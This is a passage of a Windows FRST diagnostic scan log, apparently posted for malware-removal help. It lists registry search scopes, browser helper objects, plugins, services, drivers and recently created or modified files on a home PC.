SearchScopes: HKLM - {31090377-0740-419E-BEFC-A56E50500D5B} URL = http://speedial.com/results.php?f=4&q={searchTerms}&a=spd_wnzp_14_23_ie&cd=2XzuyEtN2Y1L1QzuyBtDyDyE0DtBtCtCtCzytB0AyD0EyCyBtN0D0Tzu0SzzzzyCtN1L2XzutBtFtBtDtFtCzytFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2SyEzy0EtC0FzytAyCtG0E0FyEtAtG0DtCyBtCtGtAyByEtDtGyC0CyDtAyE0BzyyEtB0AzztB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyDtC0B0E0E0Bzz0FtG0C0DyCtDtGtDzzzz0FtGzz0DtBzztGyDzztDtDyEyC0D0DtDyC0FyB2Q&cr=1057173731&ir=
SearchScopes: HKLM - {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
SearchScopes: HKLM-x32 - DefaultScope {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
SearchScopes: HKLM-x32 - {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
SearchScopes: HKCU - {31090377-0740-419E-BEFC-A56E50500D5B} URL = 
SearchScopes: HKCU - {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = 
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Toolbar BHO -> {7c8f8fe5-9785-4f74-bcf8-895ef9752d97} -> C:\PROGRA~2\GAMING~2\bar\1.bin\gtbar.dll No File
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Jeremy and Heidi\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)

Chrome: 
=======

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 a2AntiMalware; C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe [4816568 2014-10-13] (Emsisoft GmbH)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe [3242000 2014-08-25] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe [289328 2014-08-25] (AVG Technologies CZ, s.r.o.)
R2 GFNEXSrv; C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe [156672 2011-10-13] () [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [89352 2014-09-15] (Hewlett-Packard Company)
R3 KeyIso; C:\Windows\SysWOW64\keyiso.dll [43520 2012-07-25] (Microsoft Corporation)
S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)
S3 Netlogon; C:\Windows\SysWOW64\netlogon.dll [634368 2012-07-25] (Microsoft Corporation)
S3 StorSvc; C:\Windows\SysWOW64\storsvc.dll [18432 2012-07-25] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [16056 2014-09-15] (Microsoft Corporation)
S3 COMSysApp; %SystemRoot%\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 a2acc; C:\PROGRAM FILES (X86)\EMSISOFT ANTI-MALWARE\a2accx64.sys [71472 2014-05-12] (Emsisoft GmbH)
R1 A2DDA; C:\Program Files (x86)\Emsisoft Anti-Malware\a2ddax64.sys [26176 2013-03-28] (Emsisoft GmbH)
R1 a2injectiondriver; C:\Program Files (x86)\Emsisoft Anti-Malware\a2dix64.sys [45208 2013-09-30] (Emsisoft GmbH)
R1 a2util; C:\Program Files (x86)\Emsisoft Anti-Malware\a2util64.sys [23088 2014-05-12] (Emsisoft GmbH)
R2 APXACC; C:\Windows\system32\DRIVERS\appexDrv.sys [199008 2012-06-23] (AppEx Networks Corporation)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdW86.sys [98472 2012-07-17] (Advanced Micro Devices)
S0 Avgboota; C:\Windows\System32\DRIVERS\avgboota.sys [20496 2013-09-04] (AVG Technologies CZ, s.r.o.)
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [152344 2014-06-30] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [244504 2014-07-21] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [235800 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [328984 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123672 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgwfpa; C:\Windows\system32\DRIVERS\avgwfpa.sys [270104 2014-06-30] (AVG Technologies CZ, s.r.o.)
R3 cleanhlp; C:\Program Files (x86)\Emsisoft Anti-Malware\cleanhlp64.sys [57024 2013-12-04] (Emsisoft GmbH)
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-10-13] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [64216 2014-05-12] (Malwarebytes Corporation)
R2 PEGAGFN; C:\Program Files (x86)\Toshiba\Password Utility\PEGAGFN.sys [14344 2009-09-11] (PEGATRON)
S3 RTL8192Ce; C:\Windows\system32\DRIVERS\rtwlane.sys [1496720 2012-08-13] (Realtek Semiconductor Corporation                           )
R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [1496720 2012-08-13] (Realtek Semiconductor Corporation                           )
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [28632 2012-07-31] (Windows (R) Win 7 DDK provider)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-14 19:30 - 2014-10-14 19:31 - 00016543 _____ () C:\Users\Jeremy and Heidi\Downloads\FRST.txt
2014-10-14 19:29 - 2014-10-14 19:29 - 02110464 _____ (Farbar) C:\Users\Jeremy and Heidi\Downloads\FRST64.exe
2014-10-14 12:40 - 2014-10-14 12:41 - 00060730 _____ () C:\Users\Jeremy and Heidi\Desktop\Addition.txt
2014-10-14 12:37 - 2014-10-14 19:30 - 00000000 ____D () C:\FRST
2014-10-14 12:37 - 2014-10-14 12:41 - 00083482 _____ () C:\Users\Jeremy and Heidi\Desktop\FRST.txt
2014-10-14 12:30 - 2014-10-14 12:32 - 04161313 _____ () C:\Users\Jeremy and Heidi\Desktop\tdsskiller.zip
2014-10-14 12:27 - 2014-10-14 12:28 - 00380416 _____ () C:\Users\Jeremy and Heidi\Desktop\vu0ul4gn.exe
2014-10-13 10:48 - 2014-10-13 12:43 - 00122584 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-13 10:44 - 2014-10-13 10:44 - 00001156 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-13 10:44 - 2014-10-13 10:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-13 10:44 - 2014-10-13 10:44 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-13 10:44 - 2014-10-13 10:44 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-13 10:44 - 2014-05-12 07:35 - 00091352 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-10-13 10:44 - 2014-05-12 07:35 - 00064216 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-10-13 10:44 - 2014-05-12 07:35 - 00025816 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys
2014-10-13 10:29 - 2014-10-13 10:30 - 00023038 _____ () C:\Users\Jeremy and Heidi\Desktop\dds.txt
2014-10-13 10:29 - 2014-10-13 10:30 - 00017955 _____ () C:\Users\Jeremy and Heidi\Desktop\attach.txt
2014-10-13 10:24 - 2014-10-13 10:25 - 00688992 ____R (Swearware) C:\Users\Jeremy and Heidi\Desktop\dds.com
2014-10-11 22:41 - 2014-10-11 22:41 - 00043440 _____ () C:\Users\Jeremy and Heidi\Desktop\Result.txt
2014-10-11 22:37 - 2014-10-11 22:37 - 00401920 _____ (Farbar) C:\Users\Jeremy and Heidi\Desktop\MiniToolBox.exe
2014-10-11 22:18 - 2014-10-11 22:18 - 00281280 _____ () C:\windows\Minidump\101114-49483-01.dmp
2014-10-10 08:22 - 2014-10-10 08:22 - 00000000 ____D () C:\Program Files (x86)\GPLGS
2014-10-10 08:21 - 2014-10-10 08:21 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CutePDF
2014-10-10 08:21 - 2014-10-10 08:21 - 00000000 ____D () C:\ProgramData\APN
2014-10-10 08:21 - 2014-10-10 08:21 - 00000000 ____D () C:\Program Files (x86)\Acro Software
2014-10-10 08:21 - 2014-03-05 16:31 - 00489392 _____ (Ask Partner Network) C:\Users\Jeremy and Heidi\Documents\APNSetup1.exe
2014-10-10 08:21 - 2013-10-23 14:24 - 00087600 _____ () C:\windows\system32\cpwmon64.dll
2014-10-10 08:19 - 2014-10-10 08:19 - 05254656 _____ () C:\Users\Jeremy and Heidi\Downloads\converter.exe
2014-10-10 08:19 - 2014-10-10 08:19 - 02003352 _____ (Acro Software Inc. ) C:\Users\Jeremy and Heidi\Downloads\CuteWriter.exe
2014-10-09 09:55 - 2014-10-09 09:56 - 118744568 _____ () C:\Users\Jeremy and Heidi\Downloads\OJ6600_1315-1.exe
2014-10-09 09:55 - 2014-10-09 09:55 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\Hewlett-Packard
2014-10-09 09:55 - 2014-10-09 09:55 - 00000000 ____D () C:\Program Files (x86)\Hewlett-Packard
2014-10-09 09:52 - 2014-10-09 09:53 - 05152768 _____ () C:\Users\Jeremy and Heidi\Downloads\HPSupportSolutionsFramework-11.51.0027.msi
2014-10-07 08:10 - 2014-10-07 08:10 - 00417918 _____ () C:\Users\Jeremy and Heidi\Downloads\Better-Dungeons-Mod-1.7.10.zip
2014-10-03 18:43 - 2014-10-03 18:43 - 00178800 _____ (Sony DADC Austria AG.) C:\windows\SysWOW64\CmdLineExt_x64.dll
2014-10-02 19:14 - 2014-10-02 19:14 - 00000000 ____D () C:\ProgramData\Emsisoft
2014-10-02 12:16 - 2014-10-14 19:17 - 00000000 ____D () C:\Program Files (x86)\Emsisoft Anti-Malware
2014-10-02 12:16 - 2014-10-02 12:16 - 00001145 _____ () C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk
2014-10-02 12:16 - 2014-10-02 12:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware
2014-10-02 12:11 - 2014-10-02 12:15 - 233663808 _____ (Emsisoft GmbH ) C:\Users\Jeremy and Heidi\Desktop\EmsisoftAntiMalwareSetup.exe
2014-09-30 23:15 - 2014-09-30 23:15 - 03482288 _____ (tuneuppro.com ) C:\Users\Jeremy and Heidi\Downloads\tuppsetup_9809.exe
2014-09-30 22:17 - 2014-09-30 22:17 - 00000000 ____D () C:\windows\AppReadiness
2014-09-30 22:13 - 2014-09-30 22:13 - 00423962 _____ () C:\Users\Jeremy and Heidi\Downloads\AppsDiagnostic.diagcab
2014-09-30 17:25 - 2014-09-30 17:25 - 00000836 _____ () C:\Users\Jeremy and Heidi\Downloads\Enable_PC_settings_and_Control_Panel.reg
2014-09-28 12:52 - 2014-09-28 12:52 - 03021993 _____ () C:\Users\Jeremy and Heidi\Downloads\forge-1.7.10-10.13.0.1208-installer.jar
2014-09-28 12:39 - 2014-10-13 14:57 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\.minecraft
2014-09-27 22:59 - 2014-09-27 23:00 - 00000000 ____D () C:\Users\Jeremy and Heidi\Desktop\minecraft
2014-09-27 21:43 - 2014-09-28 12:28 - 00000000 ____D () C:\Users\Jeremy and Heidi\Desktop\.minecraft.old
2014-09-27 21:42 - 2014-09-27 21:42 - 00000000 ____D () C:\Users\Jeremy and Heidi\Desktop\Aether Mod
2014-09-27 21:33 - 2014-09-27 21:33 - 01063160 _____ (Bleeping Computer, LLC) C:\Users\Jeremy and Heidi\Downloads\rkill64.exe
2014-09-27 21:32 - 2014-09-27 21:32 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\Jeremy and Heidi\Downloads\rkill.exe
2014-09-27 20:58 - 2014-09-27 20:58 - 206328880 _____ () C:\Users\Jeremy and Heidi\Desktop\Aether Mod.jar
2014-09-24 20:23 - 2014-09-24 20:23 - 00281224 _____ () C:\windows\Minidump\092414-77033-01.dmp
2014-09-22 20:50 - 2014-08-09 01:30 - 00148480 _____ (Microsoft Corporation) C:\windows\system32\poqexec.exe
2014-09-22 20:50 - 2014-08-09 01:29 - 00144896 _____ (Microsoft Corporation) C:\windows\system32\tssdisai.dll
2014-09-19 20:25 - 2014-10-13 14:57 - 00000648 _____ () C:\Users\Jeremy and Heidi\Downloads\server.properties
2014-09-19 20:25 - 2014-10-13 14:57 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\ops.json
2014-09-19 20:25 - 2014-10-13 14:57 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\banned-players.json
2014-09-19 20:25 - 2014-10-13 14:57 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\banned-ips.json
2014-09-17 21:52 - 2014-09-17 21:52 - 02346942 _____ () C:\Users\Jeremy and Heidi\Desktop\TechnicLauncher(2).exe
2014-09-17 20:55 - 2014-09-17 20:55 - 00000805 _____ () C:\Users\Jeremy and Heidi\Desktop\Minecraft(13).exe - Shortcut.lnk
2014-09-17 20:37 - 2014-10-01 08:48 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-09-17 20:37 - 2014-09-17 20:36 - 00319912 _____ (Oracle Corporation) C:\windows\system32\javaws.exe
2014-09-17 20:37 - 2014-09-17 20:36 - 00189352 _____ (Oracle Corporation) C:\windows\system32\javaw.exe
2014-09-17 20:37 - 2014-09-17 20:36 - 00189352 _____ (Oracle Corporation) C:\windows\system32\java.exe
2014-09-17 20:37 - 2014-09-17 20:36 - 00111016 _____ (Oracle Corporation) C:\windows\system32\WindowsAccessBridge-64.dll
2014-09-17 20:36 - 2014-09-17 20:36 - 31013800 _____ (Oracle Corporation) C:\Users\Jeremy and Heidi\Downloads\jre-7u67-windows-x64.exe
2014-09-17 20:36 - 2014-09-17 20:36 - 00000000 ____D () C:\Program Files\Java
2014-09-17 19:30 - 2014-09-17 19:33 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\.technic
2014-09-15 20:01 - 2014-10-10 09:04 - 00359864 _____ () C:\windows\system32\FNTCACHE.DAT
2014-09-15 19:34 - 2014-09-15 19:34 - 00000622 _____ () C:\Users\Jeremy and Heidi\Downloads\TakeOwnership.zip
2014-09-15 17:17 - 2014-10-13 12:41 - 00000000 ____D () C:\windows\ERUNT
2014-09-15 17:16 - 2014-09-15 17:16 - 01016261 _____ (Thisisu) C:\Users\Jeremy and Heidi\Downloads\JRT.exe
2014-09-15 16:24 - 2014-09-02 12:32 - 00705480 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerApp.exe
2014-09-15 16:24 - 2014-09-02 12:32 - 00104904 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-09-15 15:06 - 2014-09-15 15:13 - 03778560 _____ () C:\Users\Jeremy and Heidi\Downloads\RogueKillerX64.exe
2014-09-15 11:48 - 2014-07-15 15:51 - 00071168 _____ (Microsoft Corporation) C:\windows\system32\Drivers\hdaudbus.sys
2014-09-15 10:22 - 2014-08-16 02:34 - 02239488 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-09-15 10:22 - 2014-08-16 02:34 - 01407488 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-09-15 10:22 - 2014-08-16 02:34 - 00915968 _____ (Microsoft Corporation) C:\windows\system32\uxtheme.dll
2014-09-15 10:22 - 2014-08-16 02:34 - 00051712 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-09-15 10:22 - 2014-08-16 02:33 - 00603136 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-09-15 10:22 - 2014-08-16 02:33 - 00097280 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-09-15 10:22 - 2014-08-16 02:32 - 15399424 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-09-15 10:22 - 2014-08-16 02:32 - 03959296 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-09-15 10:22 - 2014-08-16 02:32 - 02655232 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-09-15 10:22 - 2014-08-16 02:32 - 01508864 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-09-15 10:22 - 2014-08-16 02:32 - 00855552 _____ (Microsoft Corporation) C:\windows\system32\jscript.dll
2014-09-15 10:22 - 2014-08-16 02:32 - 00451584 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-09-15 10:22 - 2014-08-16 02:32 - 00281600 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-09-15 10:22 - 2014-08-16 02:32 - 00255488 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-09-15 10:22 - 2014-08-16 00:37 - 01766400 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll
2014-09-15 10:22 - 2014-08-16 00:37 - 01180672 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 13757440 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 02861568 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 02055168 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 00690688 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 00493056 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 00357888 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll
2014-09-15 10:22 - 2014-08-16 00:36 - 00080384 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll
2014-09-15 10:22 - 2014-08-16 00:35 - 01440768 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl
2014-09-15 10:22 - 2014-03-06 17:47 - 00163840 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll
2014-09-15 10:22 - 2013-05-15 15:37 - 00044032 _____ (Microsoft Corporation) C:\windows\SysWOW64\UXInit.dll
2014-09-15 10:22 - 2013-05-15 15:35 - 00053760 _____ (Microsoft Corporation) C:\windows\system32\UXInit.dll
2014-09-15 10:22 - 2013-05-14 06:14 - 02706432 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-09-15 10:22 - 2013-05-14 02:23 - 02706432 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb
2014-09-15 10:22 - 2013-02-21 03:29 - 00109056 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesysprep.dll
2014-09-15 10:22 - 2013-02-21 03:29 - 00061440 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll
2014-09-15 10:22 - 2013-02-21 03:29 - 00039424 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll
2014-09-15 10:22 - 2013-02-21 03:29 - 00033280 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll
2014-09-15 10:22 - 2013-02-21 03:14 - 00136704 _____ (Microsoft Corporation) C:\windows\system32\iesysprep.dll
2014-09-15 10:22 - 2013-02-21 03:14 - 00053248 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-09-15 10:22 - 2013-02-19 02:53 - 00534528 _____ (Microsoft Corporation) C:\windows\SysWOW64\uxtheme.dll
2014-09-15 10:21 - 2014-08-16 02:33 - 19280384 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-09-15 10:21 - 2014-08-16 00:36 - 14369280 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll
2014-09-15 09:30 - 2014-06-10 15:44 - 00035480 _____ (Microsoft Corporation) C:\windows\system32\TsWpfWrp.exe
2014-09-15 09:30 - 2014-06-10 15:43 - 00035480 _____ (Microsoft Corporation) C:\windows\SysWOW64\TsWpfWrp.exe
2014-09-15 03:27 - 2014-09-15 03:27 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-14 04:28 - 2014-09-14 08:30 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\Ucygemx

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-14 19:00 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\system32\sru
2014-10-14 18:57 - 2012-12-18 23:25 - 01169698 _____ () C:\windows\WindowsUpdate.log
2014-10-14 18:43 - 2012-12-21 22:45 - 00000000 ____D () C:\ProgramData\MFAData
2014-10-14 16:49 - 2014-08-14 16:49 - 00000388 _____ () C:\windows\Tasks\SlimCleaner Plus (Scheduled Scan - Jeremy and Heidi).job
2014-10-14 12:28 - 2012-12-23 18:00 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\CrashDumps
2014-10-14 12:22 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\AUInstallAgent
2014-10-13 14:57 - 2014-08-23 21:16 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\usercache.json
2014-10-13 14:57 - 2014-08-23 21:16 - 00000000 ____D () C:\Users\Jeremy and Heidi\Downloads\world
2014-10-13 13:28 - 2012-07-26 00:59 - 00000000 ____D () C:\windows\CbsTemp
2014-10-13 12:42 - 2012-08-18 04:10 - 01110240 _____ () C:\windows\PFRO.log
2014-10-13 12:42 - 2012-07-26 00:22 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-10-13 10:41 - 2013-03-08 17:40 - 00098304 ___SH () C:\Users\Jeremy and Heidi\Desktop\Thumbs.db
2014-10-11 22:18 - 2012-12-23 23:14 - 00000000 ____D () C:\windows\Minidump
2014-10-11 22:18 - 2012-12-23 23:12 - 595965047 _____ () C:\windows\MEMORY.DMP
2014-10-11 21:52 - 2012-07-25 22:26 - 00262144 ___SH () C:\windows\system32\config\ELAM
2014-10-10 13:12 - 2012-08-18 04:21 - 00000000 ____D () C:\Program Files (x86)\Origin
2014-10-10 13:05 - 2012-07-26 00:28 - 00848230 _____ () C:\windows\system32\PerfStringBackup.INI
2014-10-10 10:18 - 2012-07-25 22:26 - 00524288 ___SH () C:\windows\system32\config\BBI
2014-10-10 10:15 - 2014-02-25 19:59 - 00007592 _____ () C:\Users\Jeremy and Heidi\AppData\Local\Resmon.ResmonCfg
2014-10-10 07:56 - 2012-12-23 08:59 - 00000060 _____ () C:\windows\wpd99.drv
2014-10-10 07:56 - 2012-12-23 08:59 - 00000000 ____D () C:\ProgramData\pdf995
2014-10-09 17:47 - 2014-08-28 13:01 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-10-09 09:55 - 2013-04-19 21:43 - 00000000 ____D () C:\Program Files (x86)\HP
2014-10-08 15:09 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\WinStore
2014-10-06 19:33 - 2012-07-26 00:21 - 00054557 _____ () C:\windows\setupact.log
2014-10-06 15:33 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\system32\SecureBootUpdates
2014-10-04 23:37 - 2012-12-21 19:38 - 00003600 _____ () C:\windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3754358886-4043612072-4009104627-1001
2014-10-03 18:44 - 2014-09-07 18:59 - 00001392 _____ () C:\Users\Public\Desktop\The Sims 4.lnk
2014-10-03 18:42 - 2012-08-18 04:22 - 00000000 ____D () C:\ProgramData\Origin
2014-10-02 19:57 - 2014-05-05 10:20 - 00000000 ____D () C:\Program Files (x86)\OpenDownloaderManager
2014-10-01 08:48 - 2014-08-28 13:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2014-10-01 08:48 - 2014-08-03 17:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bandicut
2014-10-01 08:48 - 2014-08-03 10:18 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nikon Message Center 2
2014-10-01 08:48 - 2014-08-03 10:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ViewNX 2
2014-10-01 08:48 - 2014-07-30 20:56 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bandicam
2014-10-01 08:48 - 2014-06-17 08:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-10-01 08:48 - 2014-06-04 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-10-01 08:48 - 2014-06-04 09:11 - 00000000 ____D () C:\Program Files\WinRAR
2014-10-01 08:48 - 2014-06-04 09:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
2014-10-01 08:48 - 2014-06-04 09:01 - 00000000 ____D () C:\Program Files\WinZip
